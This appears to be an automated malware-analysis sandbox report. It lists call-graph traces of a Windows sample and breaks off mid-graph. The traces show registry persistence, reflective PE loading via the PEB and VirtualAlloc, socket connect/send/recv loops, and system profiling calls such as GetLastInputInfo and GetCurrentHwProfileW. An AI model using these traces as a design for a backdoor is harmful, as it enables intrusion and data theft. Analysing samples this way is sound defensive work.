__CxxThrowException@8 73263->73299 73266 2715b84 CreateEventW 73264->73266 73267 2715b7a 73264->73267 73269 2715ba9 InitializeCriticalSectionAndSpinCount 73266->73269 73270 2715b9f 73266->73270 73300 2711280 DeleteCriticalSection RaiseException __CxxThrowException@8 73267->73300 73272 2715c77 InitializeCriticalSectionAndSpinCount 73269->73272 73273 2715c6d 73269->73273 73301 2711280 DeleteCriticalSection RaiseException __CxxThrowException@8 73270->73301 73275 2715c98 InterlockedExchange timeGetTime CreateEventW CreateEventW 73272->73275 73276 2715c8e 73272->73276 73302 2711280 DeleteCriticalSection RaiseException __CxxThrowException@8 73273->73302 73304 27167ff 73275->73304 73303 2711280 DeleteCriticalSection RaiseException __CxxThrowException@8 73276->73303 73280 27167ff 77 API calls 73281 2715d3b 73280->73281 73283 271681d 73282->73283 73284 271681f IsDebuggerPresent 73282->73284 73283->73253 73290 271b5e6 73284->73290 73287 271794f SetUnhandledExceptionFilter UnhandledExceptionFilter 73288 2717974 GetCurrentProcess TerminateProcess 73287->73288 73289 271796c __call_reportfault 73287->73289 73288->73253 73289->73288 73290->73287 73292 2716441 73291->73292 73293 2716437 73291->73293 73295 2715af2 InitializeCriticalSectionAndSpinCount 73292->73295 73317 2716e49 66 API calls 2 library calls 73292->73317 73316 2711280 DeleteCriticalSection RaiseException __CxxThrowException@8 73293->73316 73295->73260 73295->73261 73297->73257 73298->73261 73299->73264 73300->73266 73301->73269 73302->73272 73303->73275 73306 2716f17 73304->73306 73305 2716e83 _malloc 66 API calls 73305->73306 73306->73305 73307 2715d2b 73306->73307 73310 2716f3d std::exception::exception 73306->73310 73318 2718550 DecodePointer 73306->73318 73307->73280 73314 2716f7b 73310->73314 73319 27173e9 76 API calls __cinit 73310->73319 73311 2716f85 73321 2717836 RaiseException 73311->73321 73320 2716e24 66 API calls std::exception::operator= 73314->73320 73315 2716f96 73316->73292 73317->73295 73318->73306 73319->73314 73320->73311 73321->73315 73322 272f63d send 73323 2713200 Sleep 73324 2713208 73323->73324 73325 27132e0 6 API calls 73326 2712d80 ResetEvent InterlockedExchange timeGetTime socket 73327 2712de8 73326->73327 73328 2712dfc lstrlenW WideCharToMultiByte 73326->73328 73329 2716815 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 73327->73329 73330 27167ff 77 API calls 73328->73330 73332 2712df6 73329->73332 73331 2712e22 lstrlenW WideCharToMultiByte gethostbyname 73330->73331 73333 2712e59 ctype 73331->73333 73334 2712e60 htons connect 73333->73334 73335 2712e96 73333->73335 73334->73335 73336 2712eab setsockopt setsockopt setsockopt setsockopt 73334->73336 73337 2716815 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 73335->73337 73339 2712f52 InterlockedExchange 73336->73339 73340 2712f24 WSAIoctl 73336->73340 73338 2712ea5 73337->73338 73347 271721b 73339->73347 73340->73339 73343 271721b 755 API calls 73344 2712f91 73343->73344 73345 2716815 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 73344->73345 73346 2712fa6 73345->73346 73348 271722b 73347->73348 73349 271723f 73347->73349 73395 271710d 66 API calls __getptd_noexit 73348->73395 73368 2719754 TlsGetValue 73349->73368 73353 2717230 73396 2718702 11 API calls ___strgtold12_l 73353->73396 73357 27172a2 73397 2716e49 66 API calls 2 library calls 73357->73397 73361 27172a8 73364 2712f79 73361->73364 73398 2717133 66 API calls 3 library calls 73361->73398 73364->73343 73365 2717267 CreateThread 73365->73364 73367 271729a GetLastError 73365->73367 73456 27171b6 73365->73456 73367->73357 73369 2717245 73368->73369 73370 2719769 DecodePointer TlsSetValue 73368->73370 73371 2719fe4 73369->73371 73370->73369 73373 2719fed 73371->73373 73374 2717251 73373->73374 73375 271a00b Sleep 73373->73375 73399 271e555 73373->73399 73374->73357 73377 271990f 73374->73377 73376 271a020 73375->73376 73376->73373 73376->73374 73410 2719896 GetLastError 73377->73410 73379 2719917 73381 271725e 73379->73381 73424 2718315 66 API calls 3 library calls 73379->73424 73382 27197e2 73381->73382 73426 2719db0 73382->73426 73384 27197ee GetModuleHandleW 73427 271c144 73384->73427 73386 271982c InterlockedIncrement 73434 2719884 73386->73434 73389 271c144 __lock 64 API calls 73390 271984d 73389->73390 73437 271de7f InterlockedIncrement 73390->73437 73392 271986b 73449 271988d 73392->73449 73394 2719878 ___DllMainCRTStartup 73394->73365 73395->73353 73396->73364 73397->73361 73398->73364 73400 271e561 73399->73400 73406 271e57c 73399->73406 73401 271e56d 73400->73401 73400->73406 73408 271710d 66 API calls __getptd_noexit 73401->73408 73403 271e58f HeapAlloc 73405 271e5b6 73403->73405 73403->73406 73404 271e572 73404->73373 73405->73373 73406->73403 73406->73405 73409 2718550 DecodePointer 73406->73409 73408->73404 73409->73406 73411 2719754 ___set_flsgetvalue 3 API calls 73410->73411 73413 27198ad 73411->73413 73412 2719903 SetLastError 73412->73379 73413->73412 73414 2719fe4 __calloc_crt 62 API calls 73413->73414 73415 27198c1 73414->73415 73415->73412 73416 27198c9 DecodePointer 73415->73416 73417 27198de 73416->73417 73418 27198e2 73417->73418 73419 27198fa 73417->73419 73420 27197e2 __CRT_INIT@12 62 API calls 73418->73420 73425 2716e49 66 API calls 2 library calls 73419->73425 73422 27198ea GetCurrentThreadId 73420->73422 73422->73412 73423 2719900 73423->73412 73425->73423 73426->73384 73428 271c159 73427->73428 73429 271c16c EnterCriticalSection 73427->73429 73452 271c082 66 API calls 9 library calls 73428->73452 73429->73386 73431 271c15f 73431->73429 73453 2718315 66 API calls 3 library calls 73431->73453 73454 271c06b LeaveCriticalSection 73434->73454 73436 2719846 73436->73389 73438 271dea0 73437->73438 73439 271de9d InterlockedIncrement 73437->73439 73440 271deaa InterlockedIncrement 73438->73440 73441 271dead 73438->73441 73439->73438 73440->73441 73442 271deb7 InterlockedIncrement 73441->73442 73443 271deba 73441->73443 73442->73443 73444 271dec4 InterlockedIncrement 73443->73444 73446 271dec7 73443->73446 73444->73446 73445 271dee0 InterlockedIncrement 73445->73446 73446->73445 73447 271def0 InterlockedIncrement 73446->73447 73448 271defb InterlockedIncrement 73446->73448 73447->73446 73448->73392 73455 271c06b LeaveCriticalSection 73449->73455 73451 2719894 73451->73394 73452->73431 73454->73436 73455->73451 73457 2719754 ___set_flsgetvalue 3 API calls 73456->73457 73458 27171c1 73457->73458 73471 2719734 TlsGetValue 73458->73471 73461 27171d0 73522 2719788 DecodePointer 73461->73522 73462 27171fa 73473 2719929 73462->73473 73464 2717215 73509 2717175 73464->73509 73467 27171df 73469 27171f0 GetCurrentThreadId 73467->73469 73470 27171e3 GetLastError ExitThread 73467->73470 73469->73464 73472 27171cc 73471->73472 73472->73461 73472->73462 73474 2719935 ___DllMainCRTStartup 73473->73474 73475 271994d 73474->73475 73476 2719a37 ___DllMainCRTStartup 73474->73476 73523 2716e49 66 API calls 2 library calls 73474->73523 73478 271995b 73475->73478 73524 2716e49 66 API calls 2 library calls 73475->73524 73476->73464 73479 2719969 73478->73479 73525 2716e49 66 API calls 2 library calls 73478->73525 73482 2719977 73479->73482 73526 2716e49 66 API calls 2 library calls 73479->73526 73484 2719985 73482->73484 73527 2716e49 66 API calls 2 library calls 73482->73527 73486 2719993 73484->73486 73528 2716e49 66 API calls 2 library calls 73484->73528 73487 27199a1 73486->73487 73529 2716e49 66 API calls 2 library calls 73486->73529 73490 27199b2 73487->73490 73530 2716e49 66 API calls 2 library calls 73487->73530 73492 271c144 __lock 66 API calls 73490->73492 73493 27199ba 73492->73493 73494 27199df 73493->73494 73495 27199c6 InterlockedDecrement 73493->73495 73532 2719a43 LeaveCriticalSection _doexit 73494->73532 73495->73494 73497 27199d1 73495->73497 73497->73494 73531 2716e49 66 API calls 2 library calls 73497->73531 73498 27199ec 73499 271c144 __lock 66 API calls 73498->73499 73501 27199f3 73499->73501 73508 2719a24 73501->73508 73533 271df0e 8 API calls 73501->73533 73504 2719a31 73536 2716e49 66 API calls 2 library calls 73504->73536 73506 2719a08 73506->73508 73534 271dfa7 66 API calls 4 library calls 73506->73534 73535 2719a4f LeaveCriticalSection _doexit 73508->73535 73510 2717181 ___DllMainCRTStartup 73509->73510 73511 271990f __getptd 66 API calls 73510->73511 73512 2717186 73511->73512 73537 27152b0 73512->73537 73548 2712fb0 73512->73548 73558 27130c0 73512->73558 73563 27152d9 73512->73563 73513 2717190 73574 2717156 73513->73574 73515 2717196 73516 2719c41 __XcptFilter 66 API calls 73515->73516 73517 27171a7 73516->73517 73522->73467 73523->73475 73524->73478 73525->73479 73526->73482 73527->73484 73528->73486 73529->73487 73530->73490 73531->73494 73532->73498 73533->73506 73534->73508 73535->73504 73536->73476 73538 271536c RegOpenKeyExW RegDeleteValueW RegSetValueExW RegCloseKey 73537->73538 73544 27152cc 73537->73544 73539 27153ca 73538->73539 73540 271543c 73538->73540 73543 2715403 OpenProcess 73539->73543 73546 271542f Sleep 73539->73546 73585 2715820 105 API calls 2 library calls 73539->73585 73580 2ef0497 73540->73580 73543->73539 73545 2715415 GetExitCodeProcess 73543->73545 73544->73538 73545->73539 73546->73543 73549 27167ff 77 API calls 73548->73549 73550 2712fd3 73549->73550 73551 2713014 select 73550->73551 73552 271306d 73550->73552 73554 2713032 recv 73550->73554 73557 271710d 66 API calls ___strgtold12_l 73550->73557 73759 2713350 73550->73759 73551->73550 73551->73552 73553 2716815 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 73552->73553 73555 2713098 73553->73555 73554->73550 73555->73513 73557->73550 73559 2713128 73558->73559 73561 27130d4 73558->73561 73559->73513 73560 27130e8 Sleep 73560->73561 73561->73559 73561->73560 73562 2713104 timeGetTime 73561->73562 73562->73561 73564 27152d2 73563->73564 73565 271536c RegOpenKeyExW RegDeleteValueW RegSetValueExW RegCloseKey 73564->73565 73566 27153ca 73565->73566 73567 271543c 73565->73567 73570 2715403 OpenProcess 73566->73570 73572 271542f Sleep 73566->73572 73841 2715820 105 API calls 2 library calls 73566->73841 73573 2ef0497 583 API calls 73567->73573 73569 2715442 73569->73513 73570->73566 73571 2715415 GetExitCodeProcess 73570->73571 73571->73566 73572->73570 73573->73569 73575 2719896 __getptd_noexit 66 API calls 73574->73575 73576 2717160 73575->73576 73577 271716b ExitThread 73576->73577 73842 2719a58 79 API calls __freefls@4 73576->73842 73579 271716a 73579->73577 73586 2ef00cd GetPEB 73580->73586 73583 2715442 73583->73513 73584 2ef04a8 73584->73583 73588 2ef01cb 73584->73588 73585->73539 73587 2ef00e5 73586->73587 73587->73584 73589 2ef01e6 73588->73589 73594 2ef01df 73588->73594 73590 2ef021e VirtualAlloc 73589->73590 73589->73594 73593 2ef0238 73590->73593 73590->73594 73591 2ef0330 LoadLibraryA 73591->73593 73591->73594 73592 2ef03a3 73592->73594 73596 30811f2 73592->73596 73593->73591 73593->73592 73594->73583 73597 30811fd 73596->73597 73598 3081202 73596->73598 73614 3088262 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 73597->73614 73602 30810fc 73598->73602 73601 3081210 73601->73594 73604 3081108 ___BuildCatchObjectHelper 73602->73604 73603 3081155 73611 30811a5 ___BuildCatchObjectHelper 73603->73611 73667 307e480 73603->73667 73604->73603 73604->73611 73615 3080f98 73604->73615 73608 3081185 73609 3080f98 __CRT_INIT@12 149 API calls 73608->73609 73608->73611 73609->73611 73610 307e480 ___DllMainCRTStartup 526 API calls 73612 308117c 73610->73612 73611->73601 73613 3080f98 __CRT_INIT@12 149 API calls 73612->73613 73613->73608 73614->73598 73616 3080fa4 ___BuildCatchObjectHelper 73615->73616 73617 3080fac 73616->73617 73618 3081026 73616->73618 73671 3081a1b HeapCreate 73617->73671 73620 308102c 73618->73620 73621 3081087 73618->73621 73627 308104a 73620->73627 73636 3080fb5 ___BuildCatchObjectHelper 73620->73636 73681 3081ce6 66 API calls _doexit 73620->73681 73622 308108c 73621->73622 73623 30810e5 73621->73623 73686 3083ca0 TlsGetValue 73622->73686 73623->73636 73714 3083fa6 79 API calls __freefls@4 73623->73714 73624 3080fb1 73626 3080fbc 73624->73626 73624->73636 73672 3084014 86 API calls 4 library calls 73626->73672 73632 308105e 73627->73632 73682 3087dfb 67 API calls _free 73627->73682 73685 3081071 70 API calls __mtterm 73632->73685 73635 3080fc1 __RTC_Initialize 73645 3080fd1 GetCommandLineA 73635->73645 73660 3080fc5 73635->73660 73636->73603 73638 3081054 73683 3083cf1 70 API calls _free 73638->73683 73641 30810a9 DecodePointer 73648 30810be 73641->73648 73643 3080fca 73643->73636 73644 3081059 73684 3081a39 HeapDestroy 73644->73684 73674 308817f 71 API calls 2 library calls 73645->73674 73649 30810d9 73648->73649 73650 30810c2 73648->73650 73708 307f639 73649->73708 73695 3083d2e 73650->73695 73651 3080fe1 73675 3087bb6 73 API calls __calloc_crt 73651->73675 73655 30810c9 GetCurrentThreadId 73655->73636 73656 3080feb 73657 3080fef 73656->73657 73677 30880c4 95 API calls 3 library calls 73656->73677 73676 3083cf1 70 API calls _free 73657->73676 73673 3081a39 HeapDestroy 73660->73673 73661 3080ffb 73662 308100f 73661->73662 73678 3087e4e 94 API calls 6 library calls 73661->73678 73662->73643 73680 3087dfb 67 API calls _free 73662->73680 73665 3081004 73665->73662 73679 3081af9 77 API calls 4 library calls 73665->73679 73668 307e4af 73667->73668 73669 307e489 73667->73669 73668->73608 73668->73610 73669->73668 73670 307e491 CreateThread WaitForSingleObject 73669->73670 73670->73668 73715 307df10 73670->73715 73671->73624 73672->73635 73673->73643 73674->73651 73675->73656 73676->73660 73677->73661 73678->73665 73679->73662 73680->73657 73681->73627 73682->73638 73683->73644 73684->73632 73685->73636 73687 3081091 73686->73687 73688 3083cb5 DecodePointer TlsSetValue 73686->73688 73689 3084534 73687->73689 73688->73687 73692 308453d 73689->73692 73690 308a6f2 __calloc_crt 65 API calls 73690->73692 73691 308109d 73691->73636 73691->73641 73692->73690 73692->73691 73693 308455b Sleep 73692->73693 73694 3084570 73693->73694 73694->73691 73694->73692 73696 3084300 ___BuildCatchObjectHelper 73695->73696 73697 3083d3a GetModuleHandleW 73696->73697 73698 3088e5b __lock 64 API calls 73697->73698 73699 3083d78 InterlockedIncrement 73698->73699 73700 3083dd0 __CRT_INIT@12 LeaveCriticalSection 73699->73700 73701 3083d92 73700->73701 73702 3088e5b __lock 64 API calls 73701->73702 73703 3083d99 73702->73703 73704 3084d46 ___addlocaleref 8 API calls 73703->73704 73705 3083db7 73704->73705 73706 3083dd9 __CRT_INIT@12 LeaveCriticalSection 73705->73706 73707 3083dc4 ___BuildCatchObjectHelper 73706->73707 73707->73655 73709 307f644 RtlFreeHeap 73708->73709 73713 307f66d __dosmaperr 73708->73713 73710 307f659 73709->73710 73709->73713 73711 307f91b __gmtime64_s 64 API calls 73710->73711 73712 307f65f GetLastError 73711->73712 73712->73713 73713->73636 73714->73636 73716 3080542 67 API calls 73715->73716 73717 307df5a Sleep 73716->73717 73718 307df97 73717->73718 73719 307df74 73717->73719 73720 307dfa4 GetLocalTime wsprintfW SetUnhandledExceptionFilter 73718->73720 73721 307df9f 73718->73721 73722 307f707 77 API calls 73719->73722 73724 307fa29 289 API calls 73720->73724 73723 3077620 14 API calls 73721->73723 73725 307df7b 73722->73725 73723->73720 73727 307e003 CloseHandle 73724->73727 73726 307fa29 289 API calls 73725->73726 73728 307df8d CloseHandle 73726->73728 73729 307f707 77 API calls 73727->73729 73728->73718 73730 307e014 73729->73730 73731 307e022 73730->73731 73732 3072c90 8 API calls 73730->73732 73733 307f707 77 API calls 73731->73733 73732->73731 73734 307e036 73733->73734 73735 3079730 80 API calls 73734->73735 73740 307e04e 73734->73740 73735->73740 73736 307f876 66 API calls __NMSG_WRITE 73736->73740 73737 307e189 EnumWindows 73738 307e1a5 Sleep EnumWindows 73737->73738 73737->73740 73738->73738 73738->73740 73739 3080542 67 API calls 73739->73740 73740->73736 73740->73737 73740->73739 73741 307e1f0 Sleep 73740->73741 73742 307e239 CreateEventA 73740->73742 73758 3072da0 306 API calls 73740->73758 73741->73740 73743 307f876 __NMSG_WRITE 66 API calls 73742->73743 73748 307e281 73743->73748 73744 307ca70 113 API calls 73744->73748 73745 307e2bf Sleep RegOpenKeyExW 73746 307e2f5 RegQueryValueExW 73745->73746 73745->73748 73746->73748 73747 3075430 268 API calls 73747->73748 73748->73744 73748->73745 73748->73747 73752 307e339 73748->73752 73749 307e345 CloseHandle 73749->73740 73750 307fa29 289 API calls 73750->73752 73751 307e39f Sleep 73751->73752 73752->73749 73752->73750 73752->73751 73753 307e422 WaitForSingleObject CloseHandle 73752->73753 73754 3080542 67 API calls 73752->73754 73756 307e3dd Sleep CloseHandle 73752->73756 73757 307e3cd WaitForSingleObject CloseHandle 73752->73757 73753->73752 73755 307e43c Sleep CloseHandle 73754->73755 73755->73740 73756->73740 73757->73756 73758->73740 73760 2713366 73759->73760 73771 2711100 73760->73771 73762 27134e1 73762->73550 73763 27134c6 73764 27111b0 70 API calls 73763->73764 73765 27134d8 73764->73765 73765->73550 73766 2713378 _memmove 73766->73762 73766->73763 73767 2713403 timeGetTime 73766->73767 73769 27111b0 70 API calls 73766->73769 73788 27154c0 73766->73788 73779 27111b0 73767->73779 73769->73766 73772 2711111 73771->73772 73773 271110b 73771->73773 73820 2716ba0 73772->73820 73773->73766 73775 2711134 VirtualAlloc 73776 271116f 73775->73776 73777 2711198 73776->73777 73778 271118a VirtualFree 73776->73778 73777->73766 73778->73777 73780 27111bd 73779->73780 73781 27111c6 73780->73781 73782 2716ba0 __floor_pentium4 68 API calls 73780->73782 73781->73766 73783 27111ee 73782->73783 73784 2711214 73783->73784 73785 271121b VirtualAlloc 73783->73785 73784->73766 73786 2711236 73785->73786 73787 2711247 VirtualFree 73786->73787 73787->73766 73789 27154dc 73788->73789 73813 271580d 73788->73813 73790 2715707 VirtualAlloc 73789->73790 73791 27154e7 RegOpenKeyExW 73789->73791 73794 2715745 73790->73794 73792 2715515 RegQueryValueExW 73791->73792 73793 27155ba 73791->73793 73795 271553a 73792->73795 73796 27155ad RegCloseKey 73792->73796 73801 27156f8 73793->73801 73802 27155f5 73793->73802 73798 27167ff 77 API calls 73794->73798 73797 27167ff 77 API calls 73795->73797 73796->73793 73799 2715540 _memset 73797->73799 73800 2715758 73798->73800 73804 271554d RegQueryValueExW 73799->73804 73800->73801 73805 2715788 RegCreateKeyW 73800->73805 73806 271721b 743 API calls 73801->73806 73803 27155fe VirtualFree 73802->73803 73814 2715611 _memset 73802->73814 73803->73814 73807 2715569 VirtualAlloc 73804->73807 73808 27155aa 73804->73808 73809 27157a3 RegDeleteValueW RegSetValueExW 73805->73809 73810 27157ca RegCloseKey 73805->73810 73811 27157f3 Sleep 73806->73811 73812 27155a5 73807->73812 73808->73796 73809->73810 73810->73801 73838 2712d10 73811->73838 73812->73808 73813->73766 73815 27167ff 77 API calls 73814->73815 73817 27156b1 73815->73817 73816 27156e6 ctype 73816->73766 73817->73816 73834 27160df 73817->73834 73821 2716bad 73820->73821 73824 2717d77 __ctrlfp __floor_pentium4 73820->73824 73822 2716bde 73821->73822 73821->73824 73829 2716c28 73822->73829 73831 2717a9b 67 API calls ___strgtold12_l 73822->73831 73823 2717de5 __floor_pentium4 73828 2717dd2 __ctrlfp 73823->73828 73833 271bc80 67 API calls 6 library calls 73823->73833 73824->73823 73826 2717dc2 73824->73826 73824->73828 73832 271bc2b 66 API calls 3 library calls 73826->73832 73828->73775 73829->73775 73831->73829 73832->73828 73833->73828 73835 27160e5 73834->73835 73836 27111b0 70 API calls 73835->73836 73837 272fab1 GetCurrentThreadId 73836->73837 73839 2712d21 setsockopt CancelIo InterlockedExchange closesocket SetEvent 73838->73839 73840 2712d70 73838->73840 73839->73840 73840->73813 73841->73566 73842->73579 73843 272f927 73844 272fb9a 73843->73844 73848 27160df 71 API calls 73844->73848 73849 2715ef8 73844->73849 73853 272f997 73844->73853 73845 272fb9c 73848->73845 73850 2715f68 73849->73850 73851 2711100 70 API calls 73850->73851 73852 272f9b7 73850->73852 73851->73850 73854 2715f68 73853->73854 73855 2711100 70 API calls 73854->73855 73856 272f9b7 73854->73856 73855->73854 73857 2715e07 73858 272f0f9 RegQueryValueExW 73857->73858 73859 2713f35 __wcsrev 73858->73859 73860 40e4b8 73862 40e4c0 73860->73862 73861 40e50d 73862->73861 73865 40b968 73862->73865 73864 40e4fc LoadStringW 73864->73861 73866 40b995 73865->73866 73868 40b976 73865->73868 73866->73864 73868->73866 73870 40b920 73868->73870 73871 40b930 GetModuleFileNameW 73870->73871 73873 40b94c 73870->73873 73874 40cbac GetModuleFileNameW 73871->73874 73873->73864 73875 40cbfa 73874->73875 73880 40ca88 73875->73880 73877 40cc26 73878 40cc40 73877->73878 73879 40cc38 LoadLibraryExW 73877->73879 73878->73873 73879->73878 73881 40caa9 73880->73881 73882 40cb31 73881->73882 73898 40c7ac 73881->73898 73882->73877 73884 40cb1e 73885 40cb33 GetUserDefaultUILanguage 73884->73885 73886 40cb24 73884->73886 73904 40c15c EnterCriticalSection 73885->73904 73887 40c8d8 2 API calls 73886->73887 73887->73882 73889 40cb40 73924 40c8d8 73889->73924 73891 40cb4d 73892 40cb75 73891->73892 73893 40cb5b GetSystemDefaultUILanguage 73891->73893 73892->73882 73928 40c9bc 73892->73928 73895 40c15c 17 API calls 73893->73895 73896 40cb68 73895->73896 73897 40c8d8 2 API calls 73896->73897 73897->73892 73899 40c7ce 73898->73899 73903 40c7e0 73898->73903 73936 40c490 73899->73936 73901 40c7d8 73957 40c810 18 API calls 73901->73957 73903->73884 73905 40c1a8 LeaveCriticalSection 73904->73905 73906 40c188 73904->73906 73959 408718 73905->73959 73908 40c199 LeaveCriticalSection 73906->73908 73918 40c24a 73908->73918 73909 40c1b9 IsValidLocale 73910 40c217 EnterCriticalSection 73909->73910 73911 40c1c8 73909->73911 73912 40c22f 73910->73912 73913 40c1d1 73911->73913 73914 40c1dc 73911->73914 73920 40c240 LeaveCriticalSection 73912->73920 73961 40c040 6 API calls 73913->73961 73962 40be44 IsValidLocale GetLocaleInfoW GetLocaleInfoW 73914->73962 73917 40c1e5 GetSystemDefaultUILanguage 73917->73910 73919 40c1ef 73917->73919 73918->73889 73921 40c200 GetSystemDefaultUILanguage 73919->73921 73920->73918 73963 40be44 IsValidLocale GetLocaleInfoW GetLocaleInfoW 73921->73963 73923 40c1da 73923->73910 73926 40c8f7 73924->73926 73925 40c983 73925->73891 73926->73925 73964 40c86c 73926->73964 73969 4087fc 73928->73969 73931 40ca0c 73932 40c86c 2 API calls 73931->73932 73933 40ca20 73932->73933 73934 40ca4e 73933->73934 73935 40c86c 2 API calls 73933->73935 73934->73882 73935->73934 73937 40c4a7 73936->73937 73938 40c4bb GetModuleFileNameW 73937->73938 73939 40c4d0 73937->73939 73938->73939 73940 40c4f8 RegOpenKeyExW 73939->73940 73947 40c69f 73939->73947 73941 40c5b9 73940->73941 73942 40c51f RegOpenKeyExW 73940->73942 73958 40c2a0 7 API calls 73941->73958 73942->73941 73943 40c53d RegOpenKeyExW 73942->73943 73943->73941 73945 40c55b RegOpenKeyExW 73943->73945 73945->73941 73948 40c579 RegOpenKeyExW 73945->73948 73946 40c5d7 RegQueryValueExW 73949 40c5f5 73946->73949 73950 40c628 RegQueryValueExW 73946->73950 73947->73901 73948->73941 73951 40c597 RegOpenKeyExW 73948->73951 73953 40c5fd RegQueryValueExW 73949->73953 73952 40c644 73950->73952 73955 40c626 73950->73955 73951->73941 73951->73947 73956 40c64c RegQueryValueExW 73952->73956 73953->73955 73954 40c68e RegCloseKey 73954->73901 73955->73954 73956->73955 73957->73903 73958->73946 73960 40871e 73959->73960 73960->73909 73961->73923 73962->73917 73963->73923 73965 40c881 73964->73965 73966 40c89e FindFirstFileW 73965->73966 73967 40c8b4 73966->73967 73968 40c8ae FindClose 73966->73968 73967->73926 73968->73967 73970 408800 GetUserDefaultUILanguage GetLocaleInfoW 73969->73970 73970->73931 73971 271638b 73972 2711100 70 API calls 73971->73972 73973 2716390 73972->73973 73974 271608a 73975 27160a0 RegOpenKeyExW 73974->73975 73976 2713f35 __wcsrev 73975->73976 73977 271474c lstrlenW 73978 272fff8 73977->73978 73979 26c0032 73990 26c0ae4 GetPEB 73979->73990 73982 26c0ae4 GetPEB 73983 26c02a7 73982->73983 73984 26c04a6 GetNativeSystemInfo 73983->73984 73988 26c0a02 73983->73988 73985 26c04d3 VirtualAlloc 73984->73985 73984->73988 73986 26c04ec VirtualAlloc 73985->73986 73987 26c04ff 73985->73987 73986->73987 73992 2717813 73987->73992 73991 26c029b 73990->73991 73991->73982 73993 2717823 73992->73993 73994 271781e 73992->73994 73998 271771d 73993->73998 74006 271b54b GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 73994->74006 73997 2717831 73997->73988 73999 2717729 ___DllMainCRTStartup 73998->73999 74000 2717776 73999->74000 74001 27177c6 ___DllMainCRTStartup 73999->74001 74007 27175b9 73999->74007 74000->74001 74003 27177a6 74000->74003 74005 27175b9 __CRT_INIT@12 149 API calls 74000->74005 74001->73997 74003->74001 74004 27175b9 __CRT_INIT@12 149 API calls 74003->74004 74004->74001 74005->74003 74006->73993 74008 27175c5 ___DllMainCRTStartup 74007->74008 74009 2717647 74008->74009 74010 27175cd 74008->74010 74012 27176a8 74009->74012 74013 271764d 74009->74013 74059 271803b HeapCreate 74010->74059 74014 2717706 74012->74014 74015 27176ad 74012->74015 74019 271766b 74013->74019 74027 27175d6 ___DllMainCRTStartup 74013->74027 74069 2718306 66 API calls _doexit 74013->74069 74014->74027 74075 2719a58 79 API calls __freefls@4 74014->74075 74017 2719754 ___set_flsgetvalue 3 API calls 74015->74017 74016 27175d2 74018 27175dd 74016->74018 74016->74027 74022 27176b2 74017->74022 74060 2719ac6 86 API calls 4 library calls 74018->74060 74020 271767f 74019->74020 74070 271b0e4 67 API calls _free 74019->74070 74073 2717692 70 API calls __mtterm 74020->74073 74028 2719fe4 __calloc_crt 66 API calls 74022->74028 74027->74000 74032 27176be 74028->74032 74029 27175e2 __RTC_Initialize 74030 27175e6 74029->74030 74038 27175f2 GetCommandLineA 74029->74038 74061 2718059 HeapDestroy 74030->74061 74031 2717675 74071 27197a5 70 API calls _free 74031->74071 74032->74027 74035 27176ca DecodePointer 74032->74035 74039 27176df 74035->74039 74036 27175eb 74036->74027 74037 271767a 74072 2718059 HeapDestroy 74037->74072 74062 271b468 71 API calls 2 library calls 74038->74062 74042 27176e3 74039->74042 74043 27176fa 74039->74043 74045 27197e2 __CRT_INIT@12 66 API calls 74042->74045 74074 2716e49 66 API calls 2 library calls 74043->74074 74044 2717602 74063 271ae9f 73 API calls __calloc_crt 74044->74063 74048 27176ea GetCurrentThreadId 74045->74048 74048->74027 74049 271760c 74050 2717610 74049->74050 74065 271b3ad 95 API calls 3 library calls 74049->74065 74064 27197a5 70 API calls _free 74050->74064 74053 271761c 74054 2717630 74053->74054 74066 271b137 94 API calls 6 library calls 74053->74066 74054->74036 74068 271b0e4 67 API calls _free 74054->74068 74057 2717625 74057->74054 74067 2718119 77 API calls 4 library calls 74057->74067 74059->74016 74060->74029 74061->74036 74062->74044 74063->74049 74064->74030 74065->74053 74066->74057 74067->74054 74068->74050 74069->74019 74070->74031 74071->74037 74072->74020 74073->74027 74074->74027 74075->74027

                                                                                    Executed Functions

                                                                                    Function 03075430 Relevance: 93.2, APIs: 40, Strings: 13, Instructions: 440stringnetworklibraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 18 3075430-30754b7 call 307f707 call 3086770 * 3 gethostname gethostbyname 27 30754bd-3075504 inet_ntoa call 30803cf * 2 18->27 28 307555c-307569d MultiByteToWideChar * 2 GetLastInputInfo GetTickCount wsprintfW MultiByteToWideChar * 2 call 3077490 GetSystemInfo wsprintfW call 3076c50 call 3076ee0 GetForegroundWindow 18->28 27->28 38 3075506-3075508 27->38 41 30756b2-30756c0 28->41 42 307569f-30756ac GetWindowTextW 28->42 40 3075510-307555a inet_ntoa call 30803cf * 2 38->40 40->28 44 30756c2 41->44 45 30756cc-30756f0 lstrlenW call 3076d70 41->45 42->41 44->45 51 3075702-3075726 call 307f876 45->51 52 30756f2-30756ff call 307f876 45->52 57 3075732-3075756 lstrlenW call 3076d70 51->57 58 3075728 51->58 52->51 61 3075768-30757b9 GetModuleHandleW GetProcAddress 57->61 62 3075758-3075765 call 307f876 57->62 58->57 64 30757c6-30757cd GetSystemInfo 61->64 65 30757bb-30757c4 GetNativeSystemInfo 61->65 62->61 67 30757d3-30757e1 64->67 65->67 68 30757e3-30757eb 67->68 69 30757ed-30757f2 67->69 68->69 70 30757f4 68->70 71 30757f9-3075820 wsprintfW call 3076a70 GetCurrentProcessId 69->71 70->71 74 3075885-307588c call 3076690 71->74 75 3075822-307583c OpenProcess 71->75 83 307589e-30758ab 74->83 84 307588e-307589c 74->84 75->74 76 307583e-3075853 K32GetProcessImageFileNameW 75->76 78 3075855-307585c 76->78 79 307585e-3075866 call 30780f0 76->79 81 307587f CloseHandle 78->81 85 307586b-307586d 79->85 81->74 86 30758ac-30759a1 call 307f876 call 3076490 call 3076150 call 307fc0e GetTickCount call 308043c call 30803a8 wsprintfW GetLocaleInfoW GetSystemDirectoryW GetCurrentHwProfileW 83->86 84->86 87 307586f-3075876 85->87 88 3075878-307587e 85->88 101 30759a3-30759c8 86->101 102 30759ca-30759e9 86->102 87->81 88->81 103 30759ea-3075a14 call 3075a30 call 3073160 call 